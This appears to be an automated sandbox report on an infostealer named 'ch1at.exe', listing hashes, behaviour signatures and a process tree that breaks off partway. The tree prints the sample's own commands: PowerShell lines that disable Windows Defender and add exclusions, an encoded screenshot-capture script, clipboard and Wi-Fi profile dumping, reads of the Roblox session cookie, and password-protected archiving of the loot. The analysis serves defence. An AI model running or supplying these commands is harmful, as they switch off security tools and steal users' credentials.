Analysis

  • max time kernel
    7s
  • max time network
    19s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-11-2024 10:19

General

  • Target

    ch1at.exe

  • Size

    7.4MB

  • MD5

    c43e1ee38a2d6fe6dfe8d370b788405e

  • SHA1

    2210181145e9d85e8e28bf914cda0ab887a3a6c6

  • SHA256

    2bc70f9bc35a450d9f6bbbbc978082a71c2b3562a83829e8af5f3cf9d5e187cf

  • SHA512

    80ee0b2f78680e48ea75be7d63b19ceabd8078e0bdc0721bb8f9e54e155dc4dc3af4ee308f57ab6b65bf5a0721b7521bfa5fcb854a6f9402f98b586152885f85

  • SSDEEP

    98304:+heYg756OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3zCUTk4H1o36oaBMw:+8YUgOshoKMuIkhVastRL5Di3uMH1o36

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 43 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ch1at.exe
    "C:\Users\Admin\AppData\Local\Temp\ch1at.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3620
    • C:\Users\Admin\AppData\Local\Temp\ch1at.exe
      "C:\Users\Admin\AppData\Local\Temp\ch1at.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ch1at.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4540
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ch1at.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2380
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3900
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4044
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4692
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4480
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4952
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3592
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3784
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:448
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5092
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:2880
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1628
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:3252
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2800
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:1716
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\ch1at.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:3056
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\ch1at.exe"
              4⤵
              • Views/modifies file attributes
              PID:2888
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2384
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2536
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4848
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:4528
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2960
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:4572
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
              PID:4584
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:2176
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                PID:1208
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2072
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:4856
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:2000
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:2912
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3396
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      3⤵
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:8
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:4672
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:3136
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:4492
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        3⤵
                          PID:4088
                          • C:\Windows\system32\reg.exe
                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                            4⤵
                              PID:2336
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                            3⤵
                              PID:236
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2728
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dhamoyue\dhamoyue.cmdline"
                                  5⤵
                                    PID:3132
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDB0E.tmp" "c:\Users\Admin\AppData\Local\Temp\dhamoyue\CSC3293BE7120EF4C04A0493A6468A1B1EB.TMP"
                                      6⤵
                                        PID:1828
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                  3⤵
                                    PID:2984
                                    • C:\Windows\system32\attrib.exe
                                      attrib -r C:\Windows\System32\drivers\etc\hosts
                                      4⤵
                                      • Drops file in Drivers directory
                                      • Views/modifies file attributes
                                      PID:2800
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:3984
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:1156
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:1768
                                          • C:\Windows\system32\attrib.exe
                                            attrib +r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:1832
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:4744
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:4400
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                              3⤵
                                                PID:4336
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /FO LIST
                                                  4⤵
                                                  • Enumerates processes with tasklist
                                                  PID:2008
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:4620
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:2248
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:1572
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:4304
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:4444
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:688
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:1176
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3192
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:2040
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3372
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                3⤵
                                                                  PID:4452
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    4⤵
                                                                      PID:4348
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36202\rar.exe a -r -hp"sanko" "C:\Users\Admin\AppData\Local\Temp\v9CET.zip" *"
                                                                    3⤵
                                                                      PID:3940
                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI36202\rar.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI36202\rar.exe a -r -hp"sanko" "C:\Users\Admin\AppData\Local\Temp\v9CET.zip" *
                                                                        4⤵
                                                                          PID:3752
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                        3⤵
                                                                          PID:5104
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic os get Caption
                                                                            4⤵
                                                                              PID:2036
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                            3⤵
